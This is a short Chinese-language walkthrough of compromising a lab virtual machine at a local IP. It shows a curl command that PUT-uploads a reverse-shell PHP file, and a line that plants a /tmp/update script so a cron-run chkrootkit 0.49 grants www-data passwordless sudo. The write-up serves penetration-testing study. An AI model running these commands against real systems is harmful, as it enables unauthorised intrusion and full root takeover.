# 靶场搭建

下载虚拟机,导入到虚拟机,网卡调成 NAT 模式直接就能用

IP: 192.168.174.130

# 渗透过程

# 信息初收集

22/tcp open  ssh
80/tcp open  http

明显是 web,扫了一下路径,发现 test 外没有任何东西了,而且这个文件夹里啥都没有

发现可以使用 PUT 上传文件

于是上传反弹 shell: curl --upload-file shell.php -v --url http://192.168.174.130/test/shell.php -0 --http1.0

目标机器可能设置了出口限制,反弹端口要设置为 443 才可以拿到 shell!

监听,拿到 shell。

# 提权

没有密码,低权限账号,目标机器一个 john 用户

find / -type f -perm /4000 没有发现有可以利用的脚本

查看定时任务,发现有一个 chkrootkit ,查看版本信息 dpkg -l | grep chkrootkit

有一个漏洞可以利用,Chkrootkit 0.49 - Local Privilege Escalation

具体漏洞信息: https://www.exploit-db.com/exploits/33899

echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

这样等待一天后机器运行 chkrootkit,就有了 sudo 权限,而且不需要密码,直接 sudo su 就能拿到 root 权限了

# 小结

get 了新的提权方式。

提权方式还有很多种,需要进行总结。